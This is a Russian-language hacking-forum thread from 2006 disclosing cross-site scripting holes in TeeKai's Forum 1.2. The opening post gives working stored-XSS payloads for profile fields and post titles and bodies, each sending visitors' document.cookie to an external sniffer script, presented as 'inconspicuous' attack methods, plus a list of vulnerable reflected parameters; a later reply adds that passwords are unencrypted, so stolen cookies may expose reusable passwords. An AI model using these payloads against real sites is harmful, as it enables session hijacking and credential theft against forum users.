XSS(active & passive) в TeeKai's Forum version 1.2

Discussion in 'Уязвимости' started by _kREveDKo_, 26 Apr 2006.

  1. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    TeeKai's Forum version 1.2

    Этот движок я нашёл у себя на халявном диске большого срока давности...Поэтому я думаю он такой и дырявый.
    Поставил на локалку - и в лицо брызнуло ошибками. Странно, но на оффсайте производителя я не нашёл
    ничего связанного с форумами... (http://www.teekai.info/)



    1) Регестрируем пользователя. Лезем в профиль, вбиваем скрипт для вставки сниффера полях имени, возраста,
    паги и урла для неё, страны.

    Непалевный способ для поля url:
    http://ya.ru"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><a target="_blank

    Непалевный способ для поля name:
    Name"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><font size="1

    Непалевный способ для поля возраста, страны и названия паги:
    la"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><input class="fields

    Теперь наш скрипт выполняется при просмотре нашего профиля (там выводятся все юзверы сразу),a также при просмотре
    созданной нами темы.



    2) Создаём новый пост. Вставляем скрипт в поле для заголовка(title) и в поле для сообщения - оба они так и ждут, чтобы
    через них вставили сниффер =).

    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

    Теперь наш скрипт выполняется при просмотре созданного топика.



    3) Пассивные:


    http://ya.ru/tee/index.php?action=admin&cmd=manageforums&choose=deleteforums&id=[_X_S_S_] (из админки)
    http://ya.ru/tee/viewtopic.php?action=viewtopic&cat=[_X_S_S_]&forumname=[_X_S_S_]&command=viewtopic&name=[_X_S_S_]&date=[_X_S_S_]&time=[_X_S_S_]



    P.S. И снова я заранее извиняюсь, если эта инфа уже была где-то выложена до меня... Мне как всегда лень и жаль трафика проверять, первый ли я в нахождении багов...
     
    5 people like this.
  2. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
  3. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Рекламируется он как лёгкий и красивый =)
     
  4. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    b00zy_c0d3r,молодец;)
     
    1 person likes this.
  5. ~Fenix~

    ~Fenix~ Banned

    Joined:
    26 Jul 2005
    Messages:
    190
    Likes Received:
    50
    Reputations:
    6
    и дырявый как старая перчатка
     
  6. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Гыгы, там кстати, пасс не шифруется. Если стыбзить куки, можт пароль ещё куда подойдёт =)